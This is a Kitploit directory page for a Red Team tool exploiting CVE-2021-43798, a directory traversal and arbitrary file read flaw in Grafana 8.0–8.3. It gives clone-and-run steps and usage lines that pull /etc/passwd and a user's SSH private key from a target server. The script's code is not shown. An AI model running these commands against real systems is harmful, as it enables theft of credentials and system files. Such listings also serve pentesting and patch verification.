Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-43798 — Directory Traversal and Arbitrary File Read on Grafana | Kitploit
Tools/GitHubGitHub/wagneralves/cve-2021-43798
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming
GitHubwagneralves/cve-2021-43798

CVE-2021-43798

Directory Traversal and Arbitrary File Read on Grafana

View Repository
122 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-43798

Directory Traversal and Arbitrary File Read on Grafana

Authors:
Wagner Alves - Red Team Analyst

This exploit leverages Directory Traversal and Arbitrary File Read vulnerabilities in Grafana 8.0 - 8.3, allowing it to read files such as /etc/passwd, /etc/hosts, /home/user/.ssh/id_rsa, /etc/os-release, and other interesting files.

Installation

root@kitploit:~
git clone https://github.com/wagneralves/CVE-2021-43798.git
cd CVE-2021-43798
chmod +x ExploitGrafana.sh

Usage

root@kitploit:~
ex: ./ExploitGrafana.sh -h http://domain.xpto:3000 -f /etc/passwd

root@kitploit:~
ex: ./ExploitGrafana.sh -h http://domain.xpto:3000 -f /home/user/.ssh/id_rsa

root@kitploit:~
ex: ./ExploitGrafana.sh -h http://domain.xpto:3000 -f /home/user/.ssh/id_rsa
Download Tool